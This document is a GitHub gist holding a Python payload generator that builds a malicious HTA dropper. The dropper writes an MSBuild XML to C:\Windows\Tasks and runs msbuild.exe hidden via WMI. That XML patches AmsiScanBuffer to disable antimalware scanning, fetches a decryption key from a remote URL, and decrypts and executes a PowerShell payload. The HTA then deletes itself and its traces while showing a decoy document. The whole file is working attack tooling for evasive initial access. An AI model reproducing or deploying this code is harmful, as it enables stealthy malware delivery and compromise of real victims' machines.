Created
July 28, 2019 14:49
-
-
Save rvrsh3ll/8df22856b1f787a8149c6472cbb90818 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python2.7 | |
import argparse | |
import binascii | |
import sys | |
import base64 | |
import hashlib | |
from Crypto.Cipher import AES | |
from pkcs7 import PKCS7Encoder | |
import random | |
from random import randint | |
import string | |
def create_powershell(): | |
posh_code = """ | |
<INSERT POWERSHELL SCRIPT HERE> | |
""" | |
return posh_code | |
def encrypt(x,y): | |
key = hashlib.md5() | |
key.update(x) | |
key = key.hexdigest() | |
with open("key.txt", "w") as key_file: | |
key_file.write(key + '\n') | |
iv = '1234567812345678' | |
aes = AES.new(key, AES.MODE_CBC, iv) | |
encoder = PKCS7Encoder() | |
pad_text = encoder.encode(y) | |
cipher = aes.encrypt(pad_text) | |
enc_cipher = base64.b64encode(cipher) | |
return enc_cipher | |
def create_msbuild(x,y): | |
xml = """ | |
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<!-- C:\Windows\Microsoft.NET\Framework64\\v4.0.30319\msbuild.exe MSUpdate.xml --> | |
<PropertyGroup> | |
<FunctionName Condition="'$(FunctionName)' == ''"></FunctionName> | |
<Cmd Condition="'$(Cmd)' == ''">None</Cmd> | |
<URL Condition="'$(URL)' == ''">%s</URL> | |
</PropertyGroup> | |
<Target Name="Run"> | |
<MyClass /> | |
</Target> | |
<UsingTask | |
TaskName="MyClass" | |
TaskFactory="CodeTaskFactory" | |
AssemblyFile="C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > | |
<Task> | |
<Reference Include="System.Management.Automation" /> | |
<Code Type="Class" Language="cs"> | |
<![CDATA[ | |
using System; | |
using System.IO; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Runtime.InteropServices; | |
using System.Collections.ObjectModel; | |
using System.Management.Automation; | |
using System.Management.Automation.Runspaces; | |
using System.Text; | |
using Microsoft.Build.Framework; | |
using Microsoft.Build.Utilities; | |
using System.Security.Cryptography; | |
using System.Linq; | |
public class MyClass : Task, ITask | |
{ | |
public string funcName = "$(FunctionName)"; | |
public string Cmd = "$(Cmd)"; | |
public string URL = "$(URL)"; | |
public string encScript = ""; | |
public string encryptedScript = ""; | |
public string decryptedString = ""; | |
public string x = ""; | |
public string newKey = ""; | |
[DllImport("kernel32")] | |
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); | |
[DllImport("kernel32")] | |
public static extern IntPtr LoadLibrary(string name); | |
[DllImport("kernel32")] | |
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); | |
public override bool Execute() | |
{ | |
char[] chars = { 'A', 'm', 's', 'i', 'S', 'c', 'a', 'n', 'B', 'u', 'f', 'f', 'e', 'r' }; | |
String funcName = string.Join("", chars); | |
char[] chars2 = { 'a', 'm', 's', 'i', '.', 'd', 'l', 'l' }; | |
String libName = string.Join("", chars2); | |
IntPtr Address = GetProcAddress(LoadLibrary(libName), funcName); | |
UIntPtr size = (UIntPtr)5; | |
uint p = 0; | |
VirtualProtect(Address, size, 0x40, out p); | |
Byte[] Patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }; | |
Marshal.Copy(Patch, 0, Address, 6); | |
if (URL != "None") | |
{ | |
var key = string.Empty; | |
using (var webClient = new System.Net.WebClient()) | |
{ | |
Console.Write(URL); | |
key = webClient.DownloadString(URL); | |
newKey = key.Replace( "\\r", "").Replace( "\\n", "" ); | |
string encryptedScript = "%s"; | |
string decryptedString = DecryptAES.Decrypt(encryptedScript, newKey); | |
var bytes = Encoding.UTF8.GetBytes(decryptedString); | |
var encScript = Convert.ToBase64String(bytes); | |
byte[] data = Convert.FromBase64String(encScript); | |
string x = Encoding.ASCII.GetString(data); | |
RunPSCommand(x); | |
} | |
} | |
return true; | |
} | |
public static string RunPSCommand(string cmd) | |
{ | |
Runspace runspace = RunspaceFactory.CreateRunspace(); | |
runspace.Open(); | |
RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace); | |
Pipeline pipeline = runspace.CreatePipeline(); | |
pipeline.Commands.AddScript(cmd); | |
pipeline.Commands.Add("Out-String"); | |
Collection<PSObject> results = pipeline.Invoke(); | |
runspace.Close(); | |
StringBuilder stringBuilder = new StringBuilder(); | |
foreach (PSObject obj in results) | |
{ | |
stringBuilder.Append(obj); | |
} | |
return stringBuilder.ToString().Trim(); | |
} | |
public class DecryptAES | |
{ | |
public static string Decrypt(string cipherText, string key) | |
{ | |
string enc_cipher = cipherText; | |
var textEncoder = new UTF8Encoding(); | |
var aes = new AesManaged(); | |
aes.Key = textEncoder.GetBytes(key); | |
aes.IV = textEncoder.GetBytes("1234567812345678"); | |
var decryptor = aes.CreateDecryptor(); | |
var cipher = Convert.FromBase64String(enc_cipher); | |
var text_bytes = decryptor.TransformFinalBlock(cipher, 0, cipher.Length); | |
var text = textEncoder.GetString(text_bytes); | |
return text; | |
} | |
} | |
} | |
]]> | |
</Code> | |
</Task> | |
</UsingTask> | |
</Project> | |
""" % (x,y) | |
return xml | |
def create_hta(x,y,z): | |
length = randint(0,9) | |
t = ''.join(random.choice(string.lowercase) for i in range(length)) | |
hta_name = y | |
hta = """ | |
<script language="VBScript"> | |
Function Stream_BinaryToString(Binary) | |
Const adTypeText = 2 | |
Const adTypeBinary = 1 | |
Dim BinaryStream 'As New Stream | |
Set BinaryStream = CreateObject("ADODB.Stream") | |
BinaryStream.Type = adTypeBinary | |
BinaryStream.Open | |
BinaryStream.Write Binary | |
BinaryStream.Position = 0 | |
BinaryStream.Type = adTypeText | |
BinaryStream.CharSet = "us-ascii" | |
Stream_BinaryToString = BinaryStream.ReadText | |
Set BinaryStream = Nothing | |
End Function | |
Function Base64Decode(ByVal vCode) | |
Dim oXML, oNode | |
Set oXML = CreateObject("Msxml2.DOMDocument.3.0") | |
Set oNode = oXML.CreateElement("base64") | |
oNode.dataType = "bin.base64" | |
oNode.text = vCode | |
Base64Decode = Stream_BinaryToString(oNode.nodeTypedValue) | |
Set oNode = Nothing | |
Set oXML = Nothing | |
End Function | |
Dim data | |
data = "%s" | |
Dim content | |
content = Base64Decode(data) | |
function RandomString() | |
Randomize() | |
dim CharacterSetArray | |
CharacterSetArray = Array(_ | |
Array(7, "abcdefghijklmnopqrstuvwxyz"), _ | |
Array(1, "0123456789") _ | |
) | |
dim i | |
dim j | |
dim Count | |
dim Chars | |
dim Index | |
dim Temp | |
for i = 0 to UBound(CharacterSetArray) | |
Count = CharacterSetArray(i)(0) | |
Chars = CharacterSetArray(i)(1) | |
for j = 1 to Count | |
Index = Int(Rnd() * Len(Chars)) + 1 | |
Temp = Temp & Mid(Chars, Index, 1) | |
next | |
next | |
dim TemCopy | |
do until Len(Temp) = 0 | |
Index = Int(Rnd() * Len(Temp)) + 1 | |
TempCopy = TempCopy & Mid(Temp, Index, 1) | |
Temp = Mid(Temp, 1, Index - 1) & Mid(Temp, Index + 1) | |
loop | |
RandomString = TempCopy | |
end function | |
Dim filename | |
filename = RandomString() | |
Set objFileToWrite = CreateObject("Scripting.FileSystemObject").OpenTextFile("C:\Windows\Tasks\\%s.xml",2,true) | |
objFileToWrite.WriteLine(content) | |
objFileToWrite.Close | |
Set objFileToWrite = Nothing | |
Const HIDDEN_WINDOW = 12 | |
strComputer = "." | |
Set objWMIService = GetObject("winmgmts:" _ | |
& "{impersonationLevel=impersonate}!\\\\" & strComputer & "\\root\cimv2") | |
Set objStartup = objWMIService.Get("Win32_ProcessStartup") | |
Set objConfig = objStartup.SpawnInstance_ | |
objConfig.ShowWindow = HIDDEN_WINDOW | |
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process") | |
If GetObject("winmgmts:root\cimv2:Win32_Processor='cpu0'").AddressWidth _ | |
= 64 Then | |
errReturn = objProcess.Create("C:\Windows\Microsoft.NET\Framework64\\v4.0.30319\msbuild.exe c:\Windows\Tasks\\%s.xml", null , objConfig, intProcessID) | |
Else | |
errReturn = objProcess.Create("C:\Windows\Microsoft.NET\Framework\\v4.0.30319\msbuild.exe c:\Windows\Tasks\\%s.xml", null, objConfig, intProcessID) | |
End If | |
dim fso: set fso = CreateObject("Scripting.FileSystemObject") | |
dim CurrentDirectory | |
CurrentDirectory = fso.GetAbsolutePathName(".") | |
strComputer = "." | |
Set objWMIService = GetObject("winmgmts:" _ | |
& "{impersonationLevel=impersonate}!\\\\" & strComputer & "\\root\cimv2") | |
Set objStartup = objWMIService.Get("Win32_ProcessStartup") | |
Set objConfig = objStartup.SpawnInstance_ | |
objConfig.ShowWindow = HIDDEN_WINDOW | |
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process") | |
errReturn = objProcess.Create("cmd.exe /c del %s.hta", CurrentDirectory, objConfig, intProcessID) | |
Dim IE | |
Dim MyDocument | |
Set IE = CreateObject("InternetExplorer.Application") | |
IE.Visible = 1 | |
IE.navigate "%s" | |
Dim dteWait | |
dteWait = DateAdd("s", 1, Now()) | |
Do Until (Now() > dteWait) | |
Loop | |
errReturn = objProcess.Create("cmd.exe /c del C:\\windows\\tasks\\%s.xml", CurrentDirectory, objConfig, intProcessID) | |
self.close | |
</script> | |
""" % (x,t,t,t,hta_name,z,t) | |
f = open(hta_name + ".hta", "w+") | |
f.write(hta + '\n') | |
f.close() | |
def main(): | |
parser = argparse.ArgumentParser(description="Generate Payload") | |
parser.add_argument('--key', help="AES Key or Passphrase", required=True) | |
parser.add_argument('--url', help="URL to the key", required=True) | |
parser.add_argument('--decoy', help="URL to decoy document", required=True) | |
parser.add_argument('--hta', help="HTA file name. Extension added.", required=True) | |
args = parser.parse_args() | |
powershell = create_powershell() | |
encrypted_powershell = encrypt(args.key,powershell) | |
msbuild = create_msbuild(args.url,encrypted_powershell) | |
encodedMSBuild = base64.b64encode(msbuild) | |
create_hta(encodedMSBuild, args.hta, args.decoy) | |
if __name__ == "__main__": | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment